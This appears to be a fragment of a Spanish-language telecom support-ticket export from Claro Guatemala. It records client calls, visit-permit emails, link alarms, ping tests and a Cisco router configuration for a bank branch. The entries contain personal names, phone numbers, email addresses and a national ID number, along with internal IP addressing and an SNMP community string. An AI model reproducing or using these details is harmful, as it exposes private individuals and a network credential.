PARA: JOSUÉ SALVADOR CHIAPAS ÁLVAREZ &lt;JSCHIAPAS@MINFIN.GOB.GT&gt;; LAURA MELIZA LOPEZ CHACON &lt;LAURAM.LOPEZ@CLARO.COM.GT&gt;; BYRON SAUL GONZALEZ GARCIA &lt;BYRON.GONZALEZ@CLARO.COM.GT&gt;
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
ASUNTO: RE: GESTIÓN DE PERMISOS | DIRECCION DE TECNOLOGIAS DE LA INFORMACION. |947900001T| INTERNET_ 8 AVE. 20-59 Z.1 NIVEL 6 EDIFICIO MINISTERIO DE FINANZAS PUBLICAS GUATEMALA GUATEMALA
MUY BUEN DÍA ESTIMADO.
MUCHAS GRACIAS PROCEDEMOS CON LA VISITA Y QUEDAREMOS ENTERADOS DEL PROCESO DE GESTIÓN.
SALUDOS CORDIALES
DE: JOSUÉ SALVADOR CHIAPAS ÁLVAREZ &lt;JSCHIAPAS@MINFIN.GOB.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 8:36
PARA: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; LAURA MELIZA LOPEZ CHACON &lt;LAURAM.LOPEZ@CLARO.COM.GT&gt;; BYRON SAUL GONZALEZ GARCIA &lt;BYRON.GONZALEZ@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; HÉCTOR BENJAMÍN ROSALES OLIVA &lt;HROSALES@MINFIN.GOB.GT&gt;; LUIS SAÚL BLANCO DÁVILA &lt;LBLANCO@MINFIN.GOB.GT&gt;; OSCAR ROLANDO ARFAXAD MUTZUTZ NOJ &lt;OMUTZUTZ@MINFIN.GOB.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | DIRECCION DE TECNOLOGIAS DE LA INFORMACION. |947900001T| INTERNET_ 8 AVE. 20-59 Z.1 NIVEL 6 EDIFICIO MINISTERIO DE FINANZAS PUBLICAS GUATEMALA GUATEMALA
BUENOS DÍAS.
YA SE DIO EL ACCESO A JOSE ANGEL SANDOVAL DPI 1796 76350 0101.
LA AUTORIZACIÓN DE INGRESO SE DEMORÓ DEBIDO A QUE LA INFORMACIÓN NO SE ENVIÓ CORRECTAMENTE COMO SE LES HABÍA INDICADO EN REPETIDAS OCASIONES.
PARA LA PRÓXIMA OCASIÓN, DE SER NECESARIA LA VISITA DE PERSONAL TÉCNICO, POR FAVOR ENVIAR LOS DATOS COMO LOS REQUIERE NUESTRA ÁREA DE SEGURIDAD. ESTO CON EL PROPÓSITO DE APOYARNOS DE MANERA COORDINADA Y EVITAR ESTAS PÉRDIDAS DE TIEMPO.
GRACIAS POR SU ATENCIÓN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIEINTE JOSUE CHIAPAS 51242487 PARA SOLICITAR DATOS DE VISITA TECNICA
-ID 2001879002
NOMBRE DEL CLIENTE: DIRECCION DE TECNOLOGIAS DE LA INFORMACION.
UBICACIÓN:8 AVE. 20-59 Z.1 NIVEL 6 EDIFICIO MINISTERIO DE FINANZAS PUBLICAS
CONTACTO EN SITIO: JOSUE CHIAPAS 51242487
HORARIO DE ATENCION:CLIENTE SOLICITA VISITA PARA MAÑANA A LAS 8:00 HRS (CLIENTE SOLICITA SE PUEDA SER PUNTUAL)
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO -- JSCHIAPAS@MINFIN.GOB.GT --
MARCA, MODELO, COLOR, PLACAS, TIPO DE VEHICULO, NOMBRE COMPLETO, DPI,
DATOS ESPESIFICOS DE LAS HERRAMIENTAS QUE PERSONAL TECNICO INGRESARA:
LAPTOP: MODELO, SERIE,
TIPO DE HERRAMIENTAS
CLIENTE SOLICITA PUNTUALMENTE LOS DATOS DE PERSONAL QUE ESTARAN LLEGANDO</t>
  </si>
  <si>
    <t>F4562797</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 13 DE MAYO DE 2022 17:26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CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_FUNDGENESIS_GT_INTERNET_POPTU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2797
ID: 921500001T
IDENTIFICADOR DEL CLIENTE:  CC_FUNDGENESIS_GT_INTERNET_POPTUN
UBICADO EN:  INTERNET.- 5 AV Y 5-00 Z.1 DEL MUNICIPIO DE POPTUN, EL PETEN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4562801</t>
  </si>
  <si>
    <t>SE LE INFORMA AL CLIENTE ALEXANDER REGALADO 55895379 QUE DURANTE LAS PRUEBAS DE LLAMADAS AL GDN 24125000 NO SE TUVO NINGUN INCONVENIENTE, TODAS LAS LLAMADAS COMPLETARON AL PRIMER INTENTO, ESTUVO ATENDIENDO EL SEÑOR WILLIAMS. A SOLICITUD DEL CLIENTE SE DEJA EN MONITOREO Y SE VALIDARÁ EL DÍA LUNES 16/05 A LAS 11:00 HORAS. ID:2001439520</t>
  </si>
  <si>
    <t>F4562803</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDUARDO ZELAYA AL 50379211531  INDICA QUE EL EQUIPO NO TIENE LUCES ENCENDIDAS YA REINICIO EL EQUIPO PERO NO DA LUCES || SE NOTIFICA A GESTOR **
ID 2001582506
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDUARDO ZELAYA AL 50379211531 INDICA QUE ESTA A 5 DE LLAGAR AL SITIO || SE DEVOLVERA
LLAMADA**
ID 2001580869
**</t>
  </si>
  <si>
    <t>F4562807</t>
  </si>
  <si>
    <t>SE INFORMA ALARMA EN EL MONITOREO PROACTIVO
KENNY ROBERT RIVERA JUAREZ
VIE 13/05/2022 17:28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2807
ID: 61200234T
IDENTIFICADOR DEL CLIENTE: CC_DISTELSA_GT_3G_ZONA_9
UBICADO EN:   50259780748_1A CALLE 7-66 ZONA 9GUATEMALA GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4562810</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA LAYNEZ AL 56316761 CLIENTE BRINDA DATOS PARA LA VISITA TECNICA **
HORARIO DE ATENCION: 8:00 A 17:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: CANTON ILOM CHAJUL QUICHE FRENTE AL PARQUE
ATENDERA EN SITIO: ANDREA LAYNEZ
ID 2001742232
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE ANDREA LAYNEZ 56316761 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001580132
**</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE SE REALICE LAS PRUEBAS DE BW A LAS 12:00 HORAS-</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE ANDREA LAYNEZ AL 56316761 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001610853
**</t>
  </si>
  <si>
    <t>F4562815</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JERSON GUTIERREZ 22024080 PARA SOLICITAR DATOS DE VISITA TECNICA
-ID 2001890629
NOMBRE DEL CLIENTE: GQ, SOCIEDAD ANONIMA
UBICACIÓN:15 AVE. 0-50 COLONIA VISTA HERMOSA III CENTRO COMERCIAL SPAZIO, SEGUNDO NIVEL LOCALES L0-41 Y L0-42
CONTACTO EN SITIO: JEFE DE AGENCIA
HORARIO DE ATENCION: 10:00 - 19:00 HRS
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO -- JGUTIERREZ@QUATTRO.COM.GT</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE --
RE: ENLACE CAIDO</t>
  </si>
  <si>
    <t>SE ENVIA COREO A CL PARA QUE NOS COMPARTA DATOS PARA GESTIONAR VISITA-
RE: ENLACE CAIDO</t>
  </si>
  <si>
    <t>F4562865</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LUIS ALFREDO SARTE PERO NO CONTESTA.
2001332253, 2001332303, 2001332320
COLA:
NOMBRE: A: 47411958
NÚMERO: 47411958
DURACIÓN: 0:00:00
ESTADO: MARCANDO
DETALLES: 47411958
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/05/2022 19:19:11
COLA:
NOMBRE: A: 47411958
NÚMERO: 47411958
DURACIÓN: 0:00:09
ESTADO: MARCANDO
DETALLES: 47411958
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/05/2022 19:18:41</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DE CLIENTE ANDREA YOC SOLICITANDO AVANCES ID: 2001335280
CORRIGE EL NUMERO DE LUIS ALFREDO SARATE 47411928, SE LE LLAMA ID: 2001335595 / 2001335614
SE DEJA EN CONFERENCIA CON HUGO SOTO PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4562876</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE:
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 13 DE MAYO DE 2022 19:54PARA: WGABRIEL@BACCREDOMATIC.GT &lt;WGABRIEL@BACCREDOMATIC.GT&gt;; TELEMATICAGT@CREDOMATIC.COM &lt;TELEMATICAGT@CREDOMATIC.COM&gt;; CESOLARES@BACCREDOMATIC.GT &lt;CESOLARES@BACCREDOMATIC.GT&gt;; TELEMATICAGT@CREDOMATIC.COM &lt;TELEMATICAGT@CREDOMATIC.COM&gt;; FELIPE ESTUARDO SAQUICH COYOY &lt;FESAQUICH@BACCREDOMATIC.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE DE INTERNET ALARMADO PARA CLIENTE "CC_CREDOMATIC_GT_INTERNET_AGENCIA_012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2876
ID: 17400417T
IDENTIFICADOR DEL CLIENTE:  CC_CREDOMATIC_GT_INTERNET_AGENCIA_0128
UBICADO EN:  INTERNET_4 AVENIDA 4-27 ZONA 1 SAN CARLOS SIJA QUETZALTENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4562878</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 21:17
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; PEDRO JACOBO PAREDES LOPEZ &lt;JACOBO.PAREDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;
ASUNTO: RE: FALLA ENLACE INTERNET C657_38300523
BUENAS NOCHES ESTIMADOS(A):
COMO PARTE DEL SEGUIMIENTO AL CASO C657_38300523, SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES ANTES PLANTEADOS.
SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO LLEGANDO SIN PROBLEMAS A IP WAN DE PUNTO REMOTO Y CON SALIDA HACIA INTERNET (FIGURA 1). GRACIAS DE ANTEMANO. SALUDOS CORDIALES.
FIGURA 1. SE VALIDA SALIDA HACIA INTERNET.</t>
  </si>
  <si>
    <t>F4562887</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BYRON DIAZ - 42827211
-ID 2001998497
NOMBRE DEL CLIENTE: ASUNTOS REGULATORIOS REGISTREK, S.A.
UBICACIÓN:BLVD.LOS PROCERES 24-69 ZONA 10,EMPRESARIAL ZONA PRADERA,TORRE 1,NIVEL 14,OFICINA 1405
CONTACTO EN SITIO: BYRON DIAZ - 42827211
HORARIO DE ATENCION:8:00 - 16:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS
CLIENTE SOLICITA LA VISITA PARA LAS 14:00 HRS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BYRON DIAZ - 42827211 MENCIONA QUE NOTIFICARA A PERSONAL DE CR Y ELLOS ESTARAN RESPONDIENDO POR CORREO LA SOLICITUD QUE NECESITAN
-ID 2001988330</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO CORTES 50621054000 SE LOGRA COMUNICACION CON CLIENTE INDICA QUE UNIRA A LA PERSONA DE GT EN LA LLAMADA PARA QUE NOS PUEDA BRINDAR LOS DATOS PARA LA VISITA, PERO SE CORTA LLAMADA SE LLAMA NUEVAMENTE PERO INDICAN QUE ESTA EN UNA REUNION QUE SE LE LLAME EN 20 MIN NUEVAMENTE  **
-ID 2001604407 - 2001608286
**</t>
  </si>
  <si>
    <t>SE LLAMA A SOPORTE DE CR QUIEN INDICA QUE PERSONA EN GT SE ENCUENTRA EN REUNION, POR EL CUAL SE ESTARA DESOCUPANDOSE A LAS 12:00 HORAS INDICA QUE SE LLAME AL CONTACTO DESPUES DE LA HORA PARA QUE NOS APOYE CON LA INFORMACION NECESARIA PARA LA RECUPERACION DE GESTION-
CONTACTO ADICIONAL:  BYRON DIAZ - 502 4282-7211</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO CORTES 50621054000 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001589698</t>
  </si>
  <si>
    <t>SE LLAMA A BYRON DIAZ PARA DAR SEGUIMIENTO SIN EMBARGO NO RESPONDE ENVIA A BUZON--
4282-7211</t>
  </si>
  <si>
    <t>F4562936</t>
  </si>
  <si>
    <t>--- SE CONTINUA CON EL SEGUIMIENTO. ...
...</t>
  </si>
  <si>
    <t>--- EN BASE A LA CRONOLOGIA ANTERIOR, SE CAMBIA DE ESTADO Y SE INFORMA A CNOC REACTIVO POR SKYPE PARA SU RESPECTIVO SEGUIMIENTO. ...</t>
  </si>
  <si>
    <t>--- SE HABLA CON JAVIER SANCHEZ 42980211 (CLIENTE), AUTORIZA EL CIERRE.---
RESULTADO: LLAMADA HECHA
NOMBRE: 42980211
NÚMERO: 42980211
INICIO: HOY, 15:27
FIN: HOY, 15:28
DURACIÓN: 0:48
ID DE LLAMADA: 2001453152
...</t>
  </si>
  <si>
    <t>F4563143</t>
  </si>
  <si>
    <t>SE COMPARTE A TECNICO LA PLANTILLA PARA CAMBIO DE EQUIPO
HOSTNAME CC_BANRURAL_GT_INTERNET_AGENCIA_0075
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
!
!
!
IP DHCP EXCLUDED-ADDRESS 192.168.1.1
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.176.10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LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET2
 DESCRIPTION WAN PRINCIPAL/_/8902635T/_/
 BANDWIDTH 5120
 IP ADDRESS 10.103.21.126 255.255.255.224
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 190.149.72.37 255.255.255.252 SECONDARY
 IP ADDRESS 192.168.1.1 255.255.255.0
 RATE-LIMIT INPUT 5120000 640000 1280000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 640000 1280000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP ROUTE 0.0.0.0 0.0.0.0 10.103.21.97
IP SSH SERVER ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
IP SSH CLIENT ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_AGENCIA 75 / SAN CARLOS SIJA, 4 CALLE Y 3 AVENIDA 3-28 Z. 1 QUETZALTENANGO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
SCHEDULER ALLOCATE 60000 1000
!
END</t>
  </si>
  <si>
    <t>SIN RESPUESTA POR PARTE DE CLIENTE SE HAN LLAMADA EN REPETIDAS OCACIONES Y NO RSPONDEN COLA DE CORREOS CON SOLICITUD DE PERSONAL</t>
  </si>
  <si>
    <t>TECNICO INDICA QUE ESTA LISTO PARA CUANDO EL CLIENTE VALIDE EL ACCESO</t>
  </si>
  <si>
    <t>EN LLAMADA CON TECNICO VALIDANDO SERVICI, APARENTEMENTE CISCO DAÑADO SE PRCEDE CON INSPECCION</t>
  </si>
  <si>
    <t>ES NECESARIO CAMBIAR EQUIPO CISCO, TECNICOS PIDEN E LES LLEVE EL REPUESTO</t>
  </si>
  <si>
    <t>SE LLAMA A TECNICO SIN TENER RESPUESTA
2001590387
COLA:
NOMBRE: A: 58236635
NÚMERO: 58236635
DURACIÓN: 0:00:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 58236635
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 16/05/2022 08:32:10</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001597674</t>
  </si>
  <si>
    <t>SE CAMBIA EQUIPO CISCO,, SE INGRESA A CPE, CONFIGURACIOES DE ITERNET APLICADAS SE VALIDA SERVICIO CON MAQUINA DE TECNICO PERO AL CONECTAR MERAKI NO SE TIENE SALIDA A INTERNET POR PARTE DE LOS USUARIOS
CPE
CC_BANRURAL_GT_INTERNET_AGENCIA_0075#       SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.103.21.97            0   A4BE.2BE5.602F  ARPA   GIGABITETHERNET1
INTERNET  10.103.21.126           -   B07D.47E7.4F35  ARPA   GIGABITETHERNET1
INTERNET  190.149.72.37           -   B07D.47E7.4F30  ARPA   VLAN1
INTERNET  190.149.72.38           0   54E1.AD6F.7F90  ARPA   VLAN1
INTERNET  192.168.1.1             -   B07D.47E7.4F30  ARPA   VLAN1
CC_BANRURAL_GT_INTERNET_AGENCIA_0075#
PE 10.179.28.4.
PING -VPN-INSTANCE INTERNET_GT_DEPTAL 10.103.21.126
NUMERO DE TECNICO 59489629</t>
  </si>
  <si>
    <t>MERAKI NO DA RED INALAMBRICA CISCO CUENTA CON SERVICIO EN LAN</t>
  </si>
  <si>
    <t>F4563162</t>
  </si>
  <si>
    <t>SE ACTUALIZA A CLIENTE VIA CORREO
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 14 DE MAYO DE 2022 12:05
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; TIC POCASANGRE, BRYAN &lt;BRYAN.POCASANGRE@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; GERENTE REGIONAL - ANTONIO CAMPOSECO &lt;ANTONIO.CAMPOSECO@BANRURAL.COM.GT&gt;; AGE575 - COLOTENANGO &lt;AGE575@BANRURAL.COM.GT&gt;
ASUNTO: RE: INSESTABLE || 8901225T || BANRURAL_GT_AGENCIA_0575 || EL CENTRO A LA PAR DE LA MUNICIPALIDAD, COLOTENANGO, HUEHUETENANGO
BUENA TARDE
ESTIMADO CLIENTE, DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, LE COMENTO QUE SE REALIZÓ CAMBIO DE DEL LADO DE NODO DE CLARO, EL CUAL YA SE OBSERVA SERVICIO OPERATIVO Y SIN PERDIDAS, ADJUNTO PRUEBAS
&lt;HUEHGTHUN1T1A07A02EIM1&gt;PING -C 1000 -S 1000 -M 30 -B  -VPN BANRURAL 10.72.193.68
  PING 10.72.193.68: 1000  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.72.193.68 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 26/48/118 MS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE RETROALIMENTA A CLIENTE
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 14 DE MAYO DE 2022 9:43
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; TIC POCASANGRE, BRYAN &lt;BRYAN.POCASANGRE@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; GERENTE REGIONAL - ANTONIO CAMPOSECO &lt;ANTONIO.CAMPOSECO@BANRURAL.COM.GT&gt;; AGE575 - COLOTENANGO &lt;AGE575@BANRURAL.COM.GT&gt;
ASUNTO: RE: INSESTABLE || 8901225T || BANRURAL_GT_AGENCIA_0575 || EL CENTRO A LA PAR DE LA MUNICIPALIDAD, COLOTENANGO, HUEHUETENANGO
BUEN DÍA
ESTIMADO CLIENTE, DANDO SEGUIMIENTO AL INCIDENTE REPORTADO LE COMENTO QUE TÉCNICO SE ENCUENTRA A 2 HORAS DEL LUGAR, YA QUE COMENTA QUE EN SITIO HOY ES DÍA DE PLAZA Y EL INGRESO AL LUGAR ES MUY LENTO, SE LE ESTARÁ RETROALIMENTANDO MÁS ADELANTE.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4563171</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MIGUEL PACHECO  24874424 SE LE INFORMA QUE SE ENVIARA VISITA TECNICA PARA CERTIFICAR LA FO Y LOS EQUIPOS DE ULTIMA MILLA CONFIRMA DE ENTERADO.</t>
  </si>
  <si>
    <t>F4563214</t>
  </si>
  <si>
    <t>-* SE HABLA CON VALERIA PADILLA (CLIENTE) COMENTA QUE YA VE UP EL SERVICIO, SE LE INFORMA LO DETECTADO EN CRONOS ANTERIORES, INFORMA QUE NOTIFICARA, AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>F4563232</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE IVAN AQUINO AL 7737 0100 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO**
ID 2001609712
**</t>
  </si>
  <si>
    <t>F4563241</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOEL RODRIGUEZ AL  0050588104000 SE CONTACTA A CLIENTE || SE TRATA DE CONTACTAR A GESTOR PERO SE ENCUENTRA EN OTRA LLAMADA | SE LE INDICA A CL QUE SE LE DEVOLVERA LLAMADA **
D 2001668784
**</t>
  </si>
  <si>
    <t>SE LLLAMA A CLIENTE  JOEL RODRIGUEZ 88104000 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001965235</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOEL RODRIGUEZ AL  0050588104000 NO RESPONDE, ENVIA A BUZON SE INTENTARA
LUEGO **
ID 2001613955
**</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A CLIENTE JOEL PERO ENVIA DIRECTO A BUZON--</t>
  </si>
  <si>
    <t>SE LLAMA A FRANCISCO QUIEN INDICA QUE YA CONFIGURARON EL MIKROTIK COMENTA QUE DESEA QUE SE LE CAMBIE EL SEGMENTO DE RED SIN EMBARGO ESTARA ESCALANDO CON COMERCIAL ADICIONAL SOLICITA MAÑANA LLAMADA A LAS 14:00 HORAS PARA VALIDAR ACTUALMENTE SERVICIO RESTABLECIDO SIN EMBARGO ESTAN HACIENDO AUN PRUEBAS--</t>
  </si>
  <si>
    <t>F4563244</t>
  </si>
  <si>
    <t>SE OBSERVA QUE PUERTO DEL CHASIS CTC YA LEVANTO, CLIENTE SR. EBER CASTRO (502)4069-3045 VALIDA QUE YA TIENEN CONEXION HACIA INTERNET, INFORMA QUE NO TIENEN UPS EN SITIO, LOS EQUIPOS ESTAN CONECTADOS DIRECTO A LA CORRIENTE ELECTRICA, ID: 2001368925, INFORMARA A SU CENTRAL PARA QUE LE ENVIEN UN UPS.
FIBER1 STATUS AND CONFIGURATION
LINK	REMOTE A POWER	OAM RLB STATUS	OAM LOOPED	SFP	D/D
UP	OK	OFF	OFF	YES	YES
&lt;GMIXGTMVN1T1B03B02EIM4&gt;PING -VPN-INSTANCE INTERNET_GT_METRO 10.174.68.212
  PING 10.174.68.212: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.174.68.212: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.174.68.212: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.174.68.212: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.174.68.212: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
